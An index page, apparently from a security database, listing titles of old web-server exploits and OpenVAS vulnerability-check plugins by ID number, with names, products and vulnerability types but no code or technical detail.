[847] BadBlue 2.55 Web Server Remote Buffer Overflow
[838] webconnect 6.4.4 - 6.5 - Directory Traversal and Denial of Service exploit
[819] Savant Web Server 3.1 - Remote BoF (French Win OS support)
[787] Savant Web Server 3.1 - Remote Buffer OverflowExploit (win2003)
[782] TinyWeb 1.9 - Denial of Service Exploit
[781] Savant Web Server 3.1 - Remote Buffer Overflow Exploit
[746] Webmin 1.5 - BruteForce + Command Execution
[745] Webmin 1.5 - Web Brute Force (cgi-version)
[738] iWebNegar Configuration Nullification Denial of Service Exploit
[705] Webmin BruteForce and Command Execution Exploit
[585] MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030)
[423] Easy File Sharing Webserver 1.25 Denial of Service Exploit
[419] BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit
[406] phpMyWebhosting SQL Injection Exploit
[362] Xitami Web Server Denial of Service Exploit
[294] HP Web JetAdmin 6.5 (connectedNodes.ovpl) Remote Root Exploit
[155] GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit
[127] Opera 7.22 - File Creation and Execution Exploit (Webserver)
[124] IA WebMail 3.x - (iaregdll.dll version 1.0.0.5) Remote Exploit
[96] 4D WebSTAR FTP Server Suite Remote Buffer Overflow Exploit
[61] MS Windows 2000 RPC DCOM Interface DoS Exploit
[51] MS Windows WebDav III remote root Exploit (xwdav)
[36] MS Windows WebDav II (New) Remote Root Exploit
[34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
[27] CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit
[22] Pi3Web 2.0.1 - Denial of Service - Proof of Concept
[17] Xeneo Web Server 2.2.9.0 - Denial of Service Exploit
[2] MS Windows WebDAV Remote PoC Exploit
[1] MS Windows WebDAV (ntdll.dll) Remote Exploit
OpenVAS (Nessus) - http://www.openvas.org:
[902648] HomeSeer HS2 Web Interface Multiple Vulnerabilities
[802279] Virtual Vertex Muster Web Interface Directory Traversal Vulnerability
[103513] SMC Networks SMC8024L2 Switch Web Interface Authentication Bypass Vulnerability
[103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
[100703] Sun Java System Web Server Admin Interface Denial of Service Vulnerability
[100687] CUPS Web Interface Multiple Vulnerabilities
[100163] Home Web Server Graphical User Interface Remote Denial Of Service Vulnerability
[80033] Packeteer Web Management Interface Version
[80032] Packeteer Web Management Interface Login
[80026] Unencrypted NetScaler web management interface
[80024] NetScaler web management interface detection
[18413] Allied Telesyn Router/Switch Web interface found with default password
[17972] SonicWall SOHO Web Interface XSS
[12301] Citrix Web Interface XSS
[11125] MLDonkey web interface detection
[11076] Oracle webcache admin interface DoS
[10877] GroupWise Web Interface 'HELP' hole
[10873] GroupWise Web Interface 'HTMLVER' hole
[903038] MS Exchange Server WebReady Document Viewing Remote Code Execution Vulnerabilities (2740358)
[903013] Dell Webcam 'crazytalk4.ocx' ActiveX Multiple BOF Vulnerabilities
[902844] Oracle iPlanet Web Server Multiple Cross Site Scripting Vulnerabilities
[902822] PHP Built-in WebServer 'Content-Length' Denial of Service Vulnerability
[902724] WellinTech KingView 'KVWebSvr.dll' ActiveX Control Heap Buffer Overflow Vulnerability
[902610] IBM WebSphere Application Server Multiple CSRF Vulnerabilities
[902589] GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities
[902510] RT (Request Tracker) Search Interface Information Disclosure Vulnerability
[902457] IBM WebSphere Application Multiple Vulnerabilities Jul-11
[902414] docuFORM Mercury WebApp Multiple Cross-Site Scripting Vulnerabilities
[902371] InduSoft Web Studio Directory Traversal Vulnerability
[902346] PIPI Player PIPIWebPlayer ActiveX Control Buffer Overflow Vulnerability
[902338] AR Web Content Manager Multiple Directory Traversal Vulnerabilities
[902292] IBM WebSphere Application Server (WAS) Security Bypass Vulnerability
[902252] IBM WebSphere Application Server Administration Console DoS vulnerability
[902251] IBM WebSphere Application Server WS-Security Policy Unspecified vulnerability
[902213] IBM WebSphere Application Server (WAS) Cross-site Scripting Vulnerability
[902188] SpringSource tc Server 'JMX' Interface Security Bypass Vulnerability
[902135] TT Web Site Manager 'tt_name' Remote SQL Injection Vulnerability
[902134] TT Web Site Manager Version Detection
[902073] Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10
[901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
[901171] Kolibri Webserver 'HEAD' Request Processing Buffer Overflow Vulnerability
[901160] Google Chrome 'WebKit' Multiple Vulnerabilities (Linux) - Sep 10
[901088] Valarsoft Webmatic Multiple XSS and SQL Injection Vulnerabilities
[901087] Valarsoft Webmatic Version Detection
[901077] IBM DB2 Client Interfaces component Unspecified Vulnerabilities (Linux)
[901076] IBM DB2 Client Interfaces component Unspecified Vulnerabilities (Win)
[901024] Uebimiau Webmail Information Disclosure Vulnerability
[901023] Uebimiau Webmail Version Detection
[900943] OpenWebMail Multiple XSS Vulnerabilities
[900870] Apple Safari 'WebKit.dll' Stack Consumption Vulnerability
[900827] WebDAV Neon Version Detection
[900711] Microsoft IIS WebDAV Remote Authentication Bypass Vulnerability
[900537] DivX Web Player Buffer Overflow Vulnerability
[900534] DivX Web Player Version Detection
[900517] Opera Web Browser Multiple Vulnerabilities (Linux)
[900516] Opera Web Browser Multiple Vulnerabilities (Win)
[900441] WebSVN Script Multiple Vulnerabilities
[900440] WebSVN version detection
[900402] Pi3Web ISAPI Requests Handling DoS Vulnerability
[900380] Google Chrome Web Script Execution Vulnerabilites - Jun09
[900373] RTWebalbum SQL Injection Vulnerability
[900370] Google Chrome Web Script Execution Vulnerabilites - June09
[900369] Apple Safari Web Script Execution Vulnerabilites - June09
[900368] Opera Web Script Execution Vulnerabilities - June09 (Linux)
[900367] Opera Web Script Execution Vulnerabilities - June09 (Win)
[900366] Microsoft Internet Explorer Web Script Execution Vulnerabilites
[900289] Active Directory Certificate Services Web Enrollment Elevation of Privilege Vulnerability (2518295)
[900268] Mongoose Webserver Content-Length Denial of Service Vulnerability
[900265] Consent User Interface Privilege Escalation Vulnerability (2442962)
[900205] Trend Micro Web Management Authentication Bypass Vulnerability
[900115] Anzio Web Print Object ActiveX Control Remote BOF Vulnerability
[900103] Blue Coat K9 Web Protection Multiple Buffer Overflow Vulnerabilities
[900082] Opera Web Browser Multiple Vulnerabilities - Dec08 (Linux)
[900081] Opera Web Browser Multiple Vulnerabilities - Dec08 (Win)
[900039] Opera Web Browser Multiple Security Vulnerabilities Aug-08 (Linux)
[900038] Opera Web Browser Multiple Security Vulnerabilities Aug-08 (Win)
[900007] Outlook Web Access for Exchange Server Elevation of Privilege (953747)
[881534] CentOS Update for icedtea-web CESA-2012:1434 centos6
[881466] CentOS Update for icedtea-web CESA-2012:1132 centos6
[870858] RedHat Update for icedtea-web RHSA-2012:1434-01
[870802] RedHat Update for icedtea-web RHSA-2012:1132-01
[870727] RedHat Update for webkitgtk RHSA-2011:0177-01
[870699] RedHat Update for icedtea-web RHSA-2011:1100-01
[870653] RedHat Update for icedtea-web RHSA-2011:1441-01
[864886] Fedora Update for libsocialweb FEDORA-2012-17746
[864873] Fedora Update for libsocialweb FEDORA-2012-17749
[864864] Fedora Update for icedtea-web FEDORA-2012-17745
[864857] Fedora Update for icedtea-web FEDORA-2012-17762
[864713] Fedora Update for icedtea-web FEDORA-2012-14316
[864706] Fedora Update for icedtea-web FEDORA-2012-14340
[864389] Fedora Update for WebCalendar FEDORA-2012-1898
[864083] Fedora Update for libsocialweb FEDORA-2011-15833
[864034] Fedora Update for WebCalendar FEDORA-2012-1934
[863808] Fedora Update for icedtea-web FEDORA-2011-15691
[863646] Fedora Update for libsocialweb FEDORA-2011-15839
[863612] Fedora Update for icedtea-web FEDORA-2011-15673
[863568] Fedora Update for gnome-web-photo FEDORA-2011-13467
[863506] Fedora Update for gnome-web-photo FEDORA-2011-12275
[863453] Fedora Update for gnome-web-photo FEDORA-2011-11084
[863375] Fedora Update for icedtea-web FEDORA-2011-9541
[863337] Fedora Update for gnome-web-photo FEDORA-2011-8647
[863077] Fedora Update for gnome-web-photo FEDORA-2011-6205
[863065] Fedora Update for gnome-web-photo FEDORA-2011-6215
[862948] Fedora Update for gnome-web-photo FEDORA-2011-3917
[862940] Fedora Update for gnome-web-photo FEDORA-2011-3946
[862904] Fedora Update for pywebdav FEDORA-2011-2470
[862888] Fedora Update for pywebdav FEDORA-2011-2460
[862886] Fedora Update for gnome-web-photo FEDORA-2011-2447
[862869] Fedora Update for gnome-web-photo FEDORA-2011-2444
[862850] Fedora Update for webkitgtk FEDORA-2011-1224
[862779] Fedora Update for webkitgtk FEDORA-2011-0121
[862734] Fedora Update for gnome-web-photo FEDORA-2010-18775
[862725] Fedora Update for gnome-web-photo FEDORA-2010-18773
[862652] Fedora Update for gnome-web-photo FEDORA-2010-15093
[862581] Fedora Update for gnome-web-photo FEDORA-2010-16897
[862504] Fedora Update for gnome-web-photo FEDORA-2010-16885
[862494] Fedora Update for gnome-web-photo FEDORA-2010-16593
[862482] Fedora Update for gnome-web-photo FEDORA-2010-16883
[862465] Fedora Update for webkitgtk FEDORA-2010-15957
[862461] Fedora Update for webkitgtk FEDORA-2010-15982
[862425] Fedora Update for gnome-web-photo FEDORA-2010-15070
[862410] Fedora Update for webkitgtk FEDORA-2010-14419
[862409] Fedora Update for webkitgtk FEDORA-2010-14409
[862384] Fedora Update for gnome-web-photo FEDORA-2010-14362
[862255] Fedora Update for gnome-web-photo FEDORA-2010-11345
[862253] Fedora Update for gnome-web-photo FEDORA-2010-11375
[862190] Fedora Update for gnome-web-photo FEDORA-2010-10344
[862171] Fedora Update for gnome-web-photo FEDORA-2010-10361
[861826] Fedora Update for gnome-web-photo FEDORA-2010-5506
[861809] Fedora Update for gnome-web-photo FEDORA-2010-5515
[861640] Fedora Update for gnome-web-photo FEDORA-2010-1727
[861620] Fedora Update for gnome-web-photo FEDORA-2010-1936
[861529] Fedora Update for gnome-web-photo FEDORA-2007-3962
[861229] Fedora Update for kdewebdev FEDORA-2007-2985
[860929] Fedora Update for gnome-web-photo FEDORA-2008-11598
[860900] Fedora Update for gnome-web-photo FEDORA-2008-9669
[860728] Fedora Update for gnome-web-photo FEDORA-2008-8425
[860715] Fedora Update for gnome-web-photo FEDORA-2008-11551
[860689] Fedora Update for gnome-web-photo FEDORA-2008-9667
[860616] Fedora Update for gnome-web-photo FEDORA-2008-1535
[860563] Fedora Update for WebKit FEDORA-2008-3415
[860522] Fedora Update for gnome-web-photo FEDORA-2008-6491
[860439] Fedora Update for gnome-web-photo FEDORA-2008-6127
[860374] Fedora Update for gnome-web-photo FEDORA-2008-8399
[860195] Fedora Update for WebKit FEDORA-2008-6186
[860170] Fedora Update for gnome-web-photo FEDORA-2008-11511
[860147] Fedora Update for gnome-web-photo FEDORA-2008-3283
[860141] Fedora Update for gnome-web-photo FEDORA-2008-2682
[860117] Fedora Update for WebKit FEDORA-2008-6220
[860025] Fedora Update for WebKit FEDORA-2008-3229
[855418] Solaris Update for Sun Java Web Console (Lockhart) 121212-02
[855215] Solaris Update for Sun Java Web Console (Lockhart) 121211-02
[855209] Solaris Update for Mozilla Firefox Web browser 125540-06
[850308] SuSE Update for icedtea-web openSUSE-SU-2012:0981-1 (icedtea-web)
[850112] SuSE Update for mono-web SUSE-SA:2007:002
[841220] Ubuntu Update for libunity-webapps USN-1635-1
[841212] Ubuntu Update for icedtea-web USN-1625-1
[841198] Ubuntu Update for webkit USN-1617-1
[841127] Ubuntu Update for icedtea-web USN-1505-2
[841100] Ubuntu Update for webkit USN-1524-1
[841098] Ubuntu Update for icedtea-web USN-1521-1
[840805] Ubuntu Update for icedtea-web USN-1263-1
[840730] Ubuntu Update for webkit USN-1195-1
[840712] Ubuntu Update for icedtea-web USN-1178-1
[840517] Ubuntu Update for webkit vulnerabilities USN-1006-1
[840221] Ubuntu Update for webkit vulnerability USN-676-1
[835253] HP-UX Update for Apache Web Server HPSBUX02645
[835247] HP-UX Update for Apache-based Web Server HPSBUX02612
[835233] HP-UX Update for Apache-based Web Server HPSBUX02531
[835224] HP-UX Update for Apache-based Web Server HPSBUX02465
[835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
[835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
[835108] HP-UX Update for HP WEBM Services HPSBUX00288
[835084] HP-UX Update for Webmin HPSBUX00250
[835076] HP-UX Update for Java Web Start HPSBUX01214
[835048] HP-UX Update for JAVA Web Start HPSBUX00188
[831710] Mandriva Update for icedtea-web MDVSA-2012:122 (icedtea-web)
[831418] Mandriva Update for webmin MDVSA-2011:109 (webmin)
[831343] Mandriva Update for webkit MDVSA-2011:039 (webkit)
[831260] Mandriva Update for kolab-webadmin MDVA-2010:230 (kolab-webadmin)
[830873] Mandriva Update for webmin MDVSA-2010:036 (webmin)
[830863] Mandriva Update for mmc-web-base MDVA-2010:051 (mmc-web-base)
[830848] Mandriva Update for webkit MDVA-2010:046 (webkit)
[830601] Mandriva Update for webmin MDVA-2008:041 (webmin)
[830520] Mandriva Update for kdewebdev4 MDVA-2008:188 (kdewebdev4)
[830080] Mandriva Update for webmin MDKSA-2007:135 (webmin)
[803117] OurWebFTP Multiple Cross Site Scripting Vulnerabilities
[803108] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Mac OS X)
[803053] WeBid Multiple Vulnerabilities
[802996] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Windows)
[802993] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Mac OS X)
[802916] Simple Web Server Connection Header Buffer Overflow Vulnerability
[802851] IBM WebSphere Application Server 'plugin-key.kdb' Information Disclosure Vulnerability
[802814] Apple Safari Webkit Multiple Vulnerabilities - March12 (Win)
[802813] Apple Safari Webkit Multiple Vulnerabilities - March12 (Mac OS X)
[802797] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Mac OS X)
[802796] Apple Safari Webkit Multiple Vulnerabilities - May 12 (Windows)
[802754] Opera Web Browser Select Object Denial Of Service Vulnerability (Mac OS X)
[802685] IBM RBD Web Services Information Disclosure Vulnerability (Win)
[802601] NeoAxis Web Player Zip File Directory Traversal Vulnerability
[802563] IBM Web Experience Factory Multiple Cross Site Scripting Vulnerabilities
[802537] InduSoft Web Studio Multiple Remote Code Execution Vulnerabilitites
[802499] Apple Safari Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows)
[802498] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Mac OS X)
[802497] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Linux)
[802496] Google Chrome Webcore Webkit 'XSSAuditor.cpp' XSS Vulnerability (Windows)
[802494] Media Player Classic (MPC) Webserver Multiple Vulnerabilities
[802418] IBM WebSphere Application Server Hash Collisions DOS Vulnerability
[802413] IBM WebSphere Application Server IVT Cross Site Scripting Vulnerability
[802412] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities - (Jan2012)
[802410] HServer Webserver Multiple Directory Traversal Vulnerabilities
[802408] PHP Web Form Hash Collision Denial of Service Vulnerability (Win)
[802400] IBM WebSphere Application Server JNDI information disclosure Vulnerability
[802390] Sphinx Mobile Web Server 'comment' Multiple Cross-Site Scripting Vulnerabilities
[802350] Mbedthis AppWeb HTTP TRACE Method Cross-Site Scripting Vulnerability
[802341] Web File Browser 'act' Parameter File Download Vulnerability
[802315] Ileys Web Control SQL Injection Vulnerability
[802307] LuxCal Web Calendar SQL Injection Vulnerability
[802305] WebCalendar Multiple Cross Site Scripting Vulnerabilities
[802304] Google Chrome WebGL Texture Information Disclosure Vulnerability (Linux)
[802303] Google Chrome WebGL Texture Information Disclosure Vulnerability (Windows)
[802296] Savant Web Server Remote Buffer Overflow Vulnerability
[802293] XAMPP WebDAV PHP Upload Vulnerability
[802283] Apple Safari WebKit Information Disclosure Vulnerability (Mac OS X)
[802282] Apple Safari WebKit Information Disclosure Vulnerability (Windows)
[802280] 3S CoDeSys CmpWebServer Multiple Vulnerabilities
[802270] GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities
[802261] XAMPP Web Server Multiple Cross Site Scripting Vulnerabilities
[802258] Webmin / Usermin Login Cross Site Scripting Vulnerability
[802228] Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple XSS Vulnerabilities
[802211] Mozilla Products WebGL Information Disclosure Vulnerability July-11 (Windows)
[802156] Sunway ForceControl WebServer 'httpsvr.exe' Buffer Overflow Vulnerability
[802139] Mongoose Web Server Remote Buffer Overflow Vulnerability
[802041] PROMOTIC SCADA/HMI Webserver Directory Traversal Vulnerability
[802025] Xitami Web Server If-Modified-Since Buffer Overflow Vulnerability
[802020] Serva32 web server Denial of Service Vulnerability
[802010] Nostromo nhttpd Webserver Directory Traversal Vulnerability
[802007] Hiawatha WebServer 'Content-Length' Denial of Service Vulnerability
[801999] IBM WebSphere Application Server Admin Console Cross-site Scripting Vulnerability
[801998] IBM WebSphere Application Server JSF Application Information Disclosure Vulnerability
[801997] Oracle GlassFish/System Application Server Web Container DOS Vulnerability
[801989] CodeMeter WebAdmin 'Licenses.html' Cross Site Scripting Vulnerability
[801988] CodeMeter WebAdmin Version Detection
[801981] Xataface WebAuction and Xataface Librarian DB Multiple Vulnerabilities
[801977] IBM WebSphere Application Server Administration Directory Traversal Vulnerability
[801925] Qianbo Enterprise Web Site Management System Cross Site Scripting Vulnerability
[801911] AR Web Content Manager (AWCM) 'search.php' Cross Site Scripting Vulnerability
[801888] IBM WebSphere Application Server WS-Security XML Encryption Weakness Vulnerability
[801867] Apple Safari Webkit Multiple Vulnerabilities - March 2011
[801864] IBM WebSphere Application Server (WAS) Security Bypass Vulnerability - March 2011
[801863] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities 02 - March 2011
[801862] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities 01 - March 2011
[801861] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities - March 2011
[801859] CGI:IRC 'nonjs' Interface Cross Site Scripting Vulnerability
[801852] F-Secure Policy Manager 'WebReporting' Module XSS And Path Disclosure Vulnerabilities
[801830] Microsoft Internet Explorer 'ReleaseInterface()' Remote Code Execution Vulnerability
[801808] SurgeMail SurgeWeb Cross Site Scripting Vulnerability
[801774] Google Chrome 'Webkit' CSS Implementation DoS Vulnerability (Linux)
[801773] Google Chrome 'WebKit' CSS Implementation DoS Vulnerability (Windows)
[801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability
[801654] VMware 2 Web Server Directory Traversal Vulnerability (Win)
[801647] IBM WebSphere Application Server (WAS) Multiple Vulnerabilities
[801646] IBM WebSphere Application Server (WAS) XSS and CSRF Vulnerabilities
[801641] Apple Safari Webkit Multiple Vulnerabilities - Nov10
[801607] Oracle iPlanet Web Server Multiple Unspecified vulnerabilities
[801535] FreshWebMaster Fresh FTP Filename Directory Traversal Vulnerability
[801533] Mongoose Web Server Multiple Directory Traversal Vulnerabilities
[801532] Oracle Java System Web Server HTTP Response Splitting Vulnerability
[801518] NetArtMedia WebSiteAdmin Directory Traversal Vulnerability
[801480] Microsoft Web Services on Devices API Remote Code Execution Vulnerability (973565)
[801392] Nessus Web Server Version Detection
[801332] Apple Safari 'webkit' Denial Of Service Vulnerability
[801316] VMware WebAccess Cross Site Scripting vulnerability (Linux)
[801315] VMware WebAccess Cross Site Scripting vulnerability (Win)
[801309] VMware WebAccess Multiple Vulnerabilities (Linux)
[801308] VMware WebAccess Multiple Vulnerabilities (Win)
[801288] Wiccle Web Builder 'post_text' Cross-Site Scripting Vulnerability
[801225] Computer Associates WebScan ActiveX Control Multiple Remote Code Execution Vulnerabilities
[801223] Weborf Webserver Version Detection
[801222] Weborf 'Range' Header Denial of Service Vulnerability
[801147] Sun Java System Web Server Buffer Overflow Vulnerability (Linux)
[801146] Sun Java System Web Server Buffer Overflow Vulnerability (Win)
[800962] httpdx Web Server 'h_handlepeer()' Buffer Overflow Vulnerability
[800922] Opera Web Browser Select Object Denial Of Service Vulnerability (Linux)
[800921] Opera Web Browser Select Object Denial Of Service Vulnerability (Win)
[800899] QtWeb 'javascript:' And 'data:' URI XSS Vulnerability
[800898] QtWeb Version Detection
[800866] Sun Java System Web Proxy Server Denial Of Service Vulnerability (Linux)
[800865] Sun Java System Web Proxy Server Denial Of Service Vulnerability (Win)
[800864] Sun Java System Web Proxy Server Version Detection
[800845] Microsoft Office Web Components ActiveX Control Code Execution Vulnerability
[800826] Sun Java Web Console Multiple XSS Vulnerabilities
[800825] Sun Java Web Console Version Detection
[800822] V-webmail Multiple PHP Remote File Inclusion Vulnerability
[800821] V-webmail Version Detection
[800812] Sun Java System Web Proxy Server Vulnerabilities (Win)
[800811] Sun Java System Web Proxy Server Vulnerabilities (Win)
[800760] OpenX Administrative Interface Authentication Bypass Vulnerability
[800675] Kerio MailServer WebMail 'Integration' Page XSS Vulnerability
[800658] Sun Java System Web Server '.jsp' Information Disclosure Vulnerability (Win)
[800652] Opera Web Browser 'Refresh' Header XSS Vulnerabilities (Linux)
[800651] Opera Web Browser 'Refresh' Header XSS Vulnerabilities (Win)
[800551] Opera Web Browser XML Denial Of Service Vulnerability (Linux)
[800550] Opera Web Browser XML Denial Of Service Vulnerability (Win)
[800493] Apple Safari Webkit Multiple Vulnerabilities
[800472] WebCalendar Multiple CSS and CSRF Vulnerabilities
[800412] Mongoose Web Server Source Code Disclosure Vulnerability
[800411] NaviCOPA Web Server Source Code Disclosure Vulnerability
[800222] webcamXP URL Directory Traversal Vulnerability
[800221] webcamXP Version Detection
[800187] MinaliC Webserver Denial of Service Vulnerability
[800175] Xerver HTTP Server Web Administration Denial of Service Vulnerability
[800161] Sun Java System Web Server Denial of Service Vulnerability (Win)
[800160] Sun Java System Web Server Multiple Heap-based Buffer Overflow Vulnerabilities (Linux)
[800159] South River Technologies WebDrive Local Privilege Escalation Vulnerability
[800158] South River WebDrive Version Detection
[800157] Sun Java System Web Server Multiple Vulnerabilities (Win)
[800156] Sun Java System Web Server Multiple Vulnerabilities (Linux)
[800127] Sun Java Web Start Remote Command Execution Vulnerability (Linux)
[800126] Sun Java Web Start Remote Command Execution Vulnerability (Win)
[800121] Google Chrome Web Browser FTP Client XSS Vulnerability
[800115] Multiple XSS Vulnerabilities in PHPWebGallery - Oct08
[800100] Apple Safari WebKit Property Memory Leak Remote DoS Vulnerability
[800081] Opera Web Browser DoS attacks on MIME via malformed MIME emails (Win)
[800080] Apple iPhone Configuration Web Utility Directory Traversal Vulnerability
[800066] Opera Web Browser Heap Based Buffer Overflow Vulnerability (Win)
[800049] Opera Web Browser Command Execution and XSS Vulnerabilities (Linux)
[800048] Opera Web Browser Command Execution and XSS Vulnerabilities (Win)
[800045] Opera Web Browser Multiple XSS Vulnerability (Linux)
[800044] Opera Web Browser Multiple XSS Vulnerability (Win)
[800043] Firefox Web Browser FTP Client XSS Vulnerability (Linux)
[800042] Firefox Web Browser FTP Client XSS Vulnerability (Win)
[800026] Sun Java System Web Proxy Server Two Vulnerabilities (Linux)
[800025] Sun Java System Web Proxy Server Vulnerabilities (Win)
[103506] SpecView Web Server Directory Traversal Vulnerability
[103505] webERP Multiple Remote and Local File Include Vulnerabilities
[103487] Kerio WinRoute Firewall Web Server Remote Source Code Disclosure Vulnerability
[103476] WebCalendar Local File Include and PHP code Injection Vulnerabilities
[103439] webgrind 1.0 (file param) Local File Inclusion Vulnerability
[103434] WebcamXP and Webcam7 Directory Traversal Vulnerability
[103432] webgrind 'dataFile' Parameter Cross Site Scripting Vulnerability
[103421] STHS v2 Web Portal 'team' parameter Multiple SQL Injection Vulnerabilities
[103368] WebSVN 'path' Parameter Multiple Cross Site Scripting Vulnerabilities
[103343] webERP Information Disclosure, SQL Injection, and Cross Site Scripting Vulnerabilities
[103279] IceWarp Web Mail Multiple Information Disclosure Vulnerabilities
[103277] IBM WebSphere Application Server Cross-Site Request Forgery Vulnerability
[103234] phpWebSite 'mod.php' SQL Injection Vulnerability
[103212] phpWebSite 'page_id' Parameter Cross Site Scripting Vulnerability
[103174] Simple web-server Directory Traversal Vulnerability
[103150] Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross Site Scripting Vulnerability
[103148] up.time Software Administration Interface Remote Authentication Bypass Vulnerability
[103142] DynMedia Pro Web CMS 'downloadfile.php' Local File Disclosure Vulnerability
[103134] webEdition CMS HTML Injection and Local File Include Vulnerabilities
[103131] wodWebServer.NET 1.3.3 Directory Traversal
[103125] eDirectory DHost Web Server Detection
[103122] Apache Web Server ETag Header Information Disclosure Weakness
[103107] phpWebSite 'local' Parameter Cross Site Scripting Vulnerability
[103106] phpWebSite Detection
[103055] TinyWebGallery Cross Site Scripting and Local File Include Vulnerabilities
[103050] Weborf 'get_param_value()' Function HTTP Header Handling Denial Of Service Vulnerability
[103044] web@all 'url' Parameter Cross Site Scripting Vulnerability
[103029] IBM WebSphere Application Server Multiple Vulnerabilities
[103010] Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability
[103007] Alt-N WebAdmin Remote Source Code Information Disclosure Vulnerability
[103001] Appweb Web Server Cross Site Scripting Vulnerability
[102015] Microsoft RPC Interface Buffer Overrun (KB824146)
[102009] WebAPP Detection
[100945] Helix Server Administration Interface Cross Site Request Forgery Vulnerability
[100917] YOPS (Your Own Personal [WEB] Server) Remote Buffer Overflow Vulnerability
[100915] TinyWebGallery Multiple Cross-Site Scripting Vulnerabilities
[100904] IBM WebSphere Application Server JAX-WS Denial Of Service Vulnerability
[100891] Webmedia Explorer HTML Injection Vulnerability
[100878] Weborf HTTP Request Denial Of Service Vulnerability
[100848] Fretsweb Multiple Local File Include Vulnerabilities
[100844] Uebimiau Webmail 'stage' Parameter Local File Include Vulnerability
[100842] SurgeMail SurgeWeb Cross Site Scripting Vulnerability
[100826] Horde IMP Webmail 'fetchmailprefs.php' HTML Injection Vulnerability
[100805] Axigen Webmail Directory Traversal Vulnerability
[100788] Weborf HTTP 'modURL()' Function Directory Traversal Vulnerability
[100748] MongoDB Web Admin Detection
[100744] LiteSpeed Web Server Source Code Information Disclosure Vulnerability
[100743] NuralStorm Webmail Multiple Security Vulnerabilities
[100742] Nuralstorm Webmail Detection
[100728] Nessus Web Server Plugin Unspecified Cross Site Scripting Vulnerability
[100714] Oracle WebLogic Server Encoded URL Remote Vulnerability
[100702] Wiki Web Help 'uploadimage.php' Arbitrary File Upload Vulnerability
[100701] Wiki Web Help 'getpage.php' SQL Injection Vulnerability
[100700] Wiki Web Help Cross Site Scripting and HTML Injection Vulnerabilities
[100691] Weborf HTTP Header Processing Denial Of Service Vulnerability
[100671] IBM WebSphere Application Server 'addNode.log' Information Disclosure Vulnerability
[100647] IBM WebSphere Application Server Long Filename Information Disclosure Vulnerability
[100638] MiniWebsvr URI Directory Traversal Vulnerability
[100614] Mini Web Server Cross Site Scripting and Directory Traversal Vulnerabilities
[100609] IBM WebSphere Application Server SIP Logging Information Disclosure Vulnerability
[100567] Sun Java System Web Server Multiple Vulnerabilities
[100565] IBM WebSphere Application Server multiple vulnerabilities
[100564] IBM WebSphere Application Server Detection
[100559] WebMaid CMS Multiple Remote and Local File Include Vulnerabilities
[100558] webMAID Detection
[100494] Oracle WebLogic Server Node Manager 'beasvc.exe' Remote Command Execution Vulnerability
[100452] Zeus Web Server 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Vulnerability
[100445] Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability
[100443] Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability
[100420] Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities
[100419] Barracuda Web Application Firewall Detection
[100394] Savant Web Server Remote Buffer Overflow Vulnerability
[100378] iWeb Server URL Directory Traversal Vulnerability
[100346] HP Power Manager Management Web Server Login Remote Code Execution Vulnerability
[100332] Serv-U Web Client HTTP Request Remote Buffer Overflow Vulnerability
[100318] Cherokee Web Server Malformed Packet Remote Denial of Service Vulnerability
[100314] AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities
[100313] AfterLogic WebMail Pro Detection
[100301] JDownloader Web Detection
[100300] Thin Webserver Detection
[100287] Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability
[100286] Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability
[100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities
[100257] NaviCOPA Web Server Remote Buffer Overflow and Source Code Information Disclosure Vulnerabilities
[100247] Deonix Web Templates Management Index.PHP SQL Injection Vulnerability
[100242] CommuniGate Pro Web Mail URI Parsing HTML Injection Vulnerability
[100225] Webmedia Explorer Multiple Cross Site Scripting Vulnerabilities
[100224] Webmedia Explorer Detection
[100220] phpWebThings 'module' Parameter Local File Include Vulnerability
[100219] phpWebThings Detection
[100199] Zervit Webserver multiple vulnerabilities
[100195] Realty Web-Base 'admin/admin.php' Multiple SQL Injection Vulnerabilities
[100194] Realty Web-Base Detection
[100193] TinyWebGallery/QuiXplorer Local File Include Vulnerability
[100192] TinyWebGallery Detection
[100184] WebCalendar Detection
[100176] Axigen Web Detection
[100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
[100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
[100137] WebFileExplorer 'body.asp' SQL Injection Vulnerability
[100136] WebFileExplorer Detection
[100103] webEdition CMS 'WE_LANGUAGE' Parameter Local File Include Vulnerability
[100045] WEBJump! Multiple SQL Injection Vulnerabilities
[80094] WEBalbum Local File Include Vulnerability
[80078] phpWebThings editor_insert_bottom Parameter Remote File Include Vulnerability
[80069] Kerio WebMail v5 multiple flaws
[80056] ELOG Web LogBook global Denial of Service
